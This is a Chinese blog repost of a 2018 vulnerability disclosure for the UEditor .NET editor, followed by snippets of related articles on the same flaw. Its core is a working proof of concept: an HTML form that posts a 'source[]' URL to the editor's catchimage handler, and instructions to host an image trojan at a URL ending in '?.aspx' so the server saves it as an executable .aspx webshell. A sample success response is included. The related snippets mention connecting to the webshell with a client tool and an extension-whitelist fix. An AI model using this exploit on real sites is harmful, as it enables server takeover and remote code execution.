UEditor .net版本 getshell

最新推荐文章于 2024-04-12 14:45:00 发布
最新推荐文章于 2024-04-12 14:45:00 发布
阅读量2k 收藏
点赞数 1

原文地址:http://www.nsoad.com/Article/Vulnerabilityanalysis/20180823/1218.html

索马里的乌贼 • 2018-08-23 22:06:29

发布时间:2018-08-03
公开时间:2018-08-21
漏洞类型:逻辑漏洞
危害等级:高
漏洞编号:xianzhi-2018-08-16052905(不收取 驳回)
测试版本:github最新版

漏洞详情

https://github.com/fex-team/ueditor/blob/dev-1.5.0/net/App_Code/CrawlerHandler.cs
Crawler方法对source[]的检查仅仅是一个ContentType

 if (response.ContentType.IndexOf("image") == -1)
            {
                State = "Url is not an image";
                return this;
            }

并没有检查文件扩展名就直接保存到本地 导致getshell

POC:

<form action="http://xx.com/editor/ueditor/net/controller.ashx?action=catchimage" enctype="multipart/form-data" method="POST">
  <p>shell addr: <input type="text" name="source[]" /></p>
  <input type="submit" value="Submit" />
</form>

shell addr 可以用http://www.xxx.com/xxx.jpg?.aspx的方式使用包含木马的图片(为了使服务器返回的ContentType是image/xxx)
也可以用http://www.xxxx.com/xxx.php?.aspx然后在xxx.php中自己设置ContentType

返回如下

{"state":"SUCCESS","list":[{"state":"SUCCESS","source":"http://www.xxxx.com//upload/Encyclopedias/201808/03/2018080300550278683.png?.aspx","url":"/upload/image/201808/03/6366885698033038502306919.aspx"}]}

 

版权属于:jianshu

转载时必须以链接形式注明原始出处及本声明。

大方子
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ue编辑器漏洞_ueditor getshell漏洞重现及分析
weixin_39633165的博客
12-21 951
0x00 概述8月21日,网上爆出ueditor .net版本getshell漏洞,由于只校验ContentType而没校验文件后缀导致getshell。0x01 漏洞重现Payload:shelladdr:图片马x.jpg放在自己服务器上提交http://www.domain.top/x.jpg?.aspx返回:菜刀连接:0x02 修复方案增加文件扩展名校验(白名单)0x03 漏洞分析uedi...
ueditor php漏洞,ueditor getshell漏洞重现及分析
weixin_33520805的博客
03-23 1660
0x00 概述8月21日,网上爆出ueditor .net版本getshell漏洞,由于只校验ContentType而没校验文件后缀导致getshell。0x01 漏洞重现Payload:shelladdr:图片马x.jpg放在自己服务器上提交http://www.domain.top/x.jpg?.aspx 返回: 菜刀连接: 0x02 修复方案增加文件扩展名校验(白名单)0x03 漏洞分析u...
UEditor 任意文件上传漏洞
zkaqlaoniao的博客
04-09 1024
前段时间在做某政府单位的项目的时候发现存在该漏洞,虽然是一个老洞,但这也是容易被忽视,且能快速拿到shell的漏洞,在利用方式上有一些不一样的心得,希望能帮助到一些还不太了解的小伙伴,故此写了此篇文章。Ueditor是百度开发的一个网站编辑器,目前已经不对其进行后续开发和更新,该漏洞只存在于该编辑器的.net版本。其他的php,jsp,asp版本不受此UEditor的漏洞的影响,.net存在任意文件上传,绕过文件格式的限制,在获取远程资源的时候并没有对远程文件的格式进行严格的过滤与判断。
UEditor(.net版本)
07-13
Ueditor富文本编辑器 .Net 版,支持 Access,SQL Server数据库。数据库类型可在web.config中设置,数据库链接在DataBaseHepler中设置
技术分享-ueditor漏洞利用&源码分析超详细分析
A_991128a的博客
03-06 1211
ueditor的漏洞主要存在于其上传功能中,攻击者可以利用上传漏洞将恶意脚本上传到服务器,从而获取服务器的控制权或者进行其他恶意行为。攻击者一般通过修改上传文件的后缀名或者修改文件内容的方式来绕过服务器的安全检测。ueditor的上传功能在其server下的文件Uploader.cs中实现。Uploader.cs中主要实现了文件上传的功能,并且包含了一些安全检测的代码。其中,一个重要的安全检测就是检测上传文件的后缀名是否在指定的白名单之内。
UEditor .Net版本任意文件上传漏洞复现总结
weixin_50464560的博客
04-18 3069
UEditor .Net版本任意文件上传漏洞复现总结 - 知乎 (zhihu.com) 这个洞有一定年数了,是2018年发现的(从下图的shodan中可以得知,该漏洞已经被大部分黑客SEO利用),最近看到一个表哥研究这个洞,就顺便拿来复现分析了一波。 一、漏洞介绍 Ueditor是百度开发的一个网站编辑器,目前已经不对其进行后续开发和更新,该漏洞只存在于该编辑器的.net版本。 漏洞的成因是在获取图片资源时仅检查了ContentType,导致可以绕过达到任意文件上传。 Crawler方法对
ueditor getshell漏洞重现及分析
weixin_30681121的博客
12-07 1243
0x00 概述 8月21日,网上爆出ueditor .net版本getshell漏洞,由于只校验ContentType而没校验文件后缀导致getshell。 0x01 漏洞重现 Payload: <formaction=”http://www.xxx.com/controller.ashx?action=catchimage”enctype=”application/x-w...
UEditor .Net版本任意文件上传漏洞
Jietewang的博客
07-18 2013
目录 前言 漏洞利用 前言 最近接到以前老客户的刷脸需求进行一次测试,挖到了一个漏洞,借机更新一下博客吧。UEditor是一款所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点,被广大WEB应用程序所使用。本次爆出的高危漏洞属于.NET版本,其它的版本暂时不受影响。漏洞成因是在抓取远程数据源的时候未对文件后缀名做验证导致任意文件写入漏洞,攻击者利用此漏洞可以在服务器上执行任意指令。 漏洞利用 隐患url: http://XXX.XXX.XXX.XXX:1111...
百度编辑器UEditor .NET版 v1.4.3.2
10-28
Ueditor是由百度web前端研发部开发所见即所得的编辑器,具有轻量,可定制,注重用户体验等特点。Ueditor基于BSD开源协议,除了具有代码精简、加载迅速的轻量级特质外,还采用了分层理念,使开发者可以根据实际应用和...
ueditor .net 配置
01-20
百度ueditor .net 基本配置好的
百度编辑器UEditor .NET版源代码
03-18
Ueditor是由百度web前端研发部开发所见即所得的编辑器,具有轻量,可定制,注重用户体验等特点。Ueditor基于BSD开源协议,除了具有代码精简、加载迅速的轻量级特质外,还采用了分层理念,使开发者可以根据实际应用和...
百度编辑器UEditor .NET版 v1.4.3
04-03
Ueditor是由百度web前端研发部开发所见即所得的编辑器,具有轻量,可定制,注重用户体验等特点。Ueditor基于BSD开源协议,除了具有代码精简、加载迅速的轻量级特质外,还采用了分层理念,使开发者可以根据实际应用和...
Python-ueGetshellpyueditornetgetshell漏洞检测工具
08-10
ueGetshell.py - ueditor .net getshell漏洞检测工具
ueditor1.3.6 .net2.0可用版本
08-08
ueditor1.3.6 .net2.0。可用版本 1.3.6就已经开始部分用.net3.5的代码开始写了, 这一份是讲用。net3.5方式写的东西全部改成2.0的了。 由于项目需要,所以我在config.js里面删除了部分不需要的功能按钮,和net/Config.cs返回的上传目录。如果需要,请自行修改
百度编辑器UEditor v1.4.3.2.NET版 UTF-8.zip
07-09
百度编辑器UEditor v1.4.3.2 更新日志: 更新 video-js 以修复 XSS 安全漏洞 百度编辑器UEditor简介 百度编辑器Ueditor是由百度web前端研发部开发所见即所得的编辑器,具有轻量,可定制,注重用户体验等特点。 Ueditor基于BSD开源协议,除了具有代码精简、加载迅速的轻量级特质外,还采用了分层理念,使开发者可以根据实际应用和需求自由定制。 Ueditor编辑器划分为了三层架构。其中,核心层为开发者提供了诸如range、selection、domUtils类的底层API接口,中间的命令插件层不仅提供了大量的基础command,还允许开发者基于核心层进行command命令的开发,而面向用户端的界面层则可以提供自由定制的用户交互界面。Ueditor开源编辑器这种拥有可配性的模式,令开发者能够根据自身需要接入任何一层进行开发。 百度编辑器UEditor页面截图展示   相关阅读 同类推荐:站长常用源码
针对Ueditor不出网getshell的解决方法
Adminxe的博客
09-18 676
刚才转csdn,发现az写了一个关于Ueditor不出网问题的解决问题,思路非常不错,相当于组合拳形式,然后我来做个总结: 1、针对于不出网问题,可以使用127.0.0.1或者localhost进行绕过,当然绕过的前提是通过ueditor编辑器上传一张图片马,记住哈,一定要用被攻击站点的编辑器进行上传,然后获取到图片马的地址; 2、第二点需要主义的就是127.0.0.1或者localhost对外开放的端口问题,利用伪协议探测端口或者强大的信息收集能力获取内网ip及端口,从而找到出口地方还是.
实战 UEditor 任意文件上传漏洞
sweelg的博客
09-08 1347
该漏洞影响UEditor.Net版本,其它语言版本暂时未受影响 影响版本 1.4.3.3 .NET
实战纪实 | 编辑器漏洞之Ueditor-任意文件上传漏洞 (老洞新谈)
最新发布
zkaqlaoniao的博客
04-12 1291
前段时间在做某政府单位的项目的时候发现存在该漏洞,虽然是一个老洞,但这也是容易被忽视,且能快速拿到shell的漏洞,在利用方式上有一些不一样的心得,希望能帮助到一些还不太了解的小伙伴,故此写了此篇文章。Ueditor是百度开发的一个网站编辑器,目前已经不对其进行后续开发和更新,该漏洞只存在于该编辑器的.net版本。其他的php,jsp,asp版本不受此UEditor的漏洞的影响,.net存在任意文件上传,绕过文件格式的限制,在获取远程资源的时候并没有对远程文件的格式进行严格的过滤与判断。
ueditor .net 1.3.6 上传文件图片报500
12-22
ueditor .net 1.3.6 是一个用于上传文件和图片的插件,当出现上传文件图片报500的情况时,通常是由于服务器端出现了错误。这种情况可能是由于服务器配置问题、权限问题或者代码问题导致的。 首先,可以尝试检查服务器端的配置是否正确,确保上传文件的大小和类型不超出服务器的限制,并且确保有足够的空间可以存储上传的文件和图片。 其次,需要检查文件和图片上传的路径是否设置正确,确保程序可以正确找到并存储上传的文件。 另外,还需要检查代码是否正确,尤其是在进行文件上传时的代码逻辑是否有误,可能是由于程序逻辑错误导致的上传失败。 在排查以上可能原因后,如果问题依然存在,可以尝试查看服务器端的日志,以获取更详细的错误信息,这样能够更好地定位和解决问题。 总之,上传文件图片报500的问题通常是由于服务器端配置、路径设置或代码逻辑等方面的错误导致的,需要仔细排查并逐一解决。希望以上建议可以帮助解决这个问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值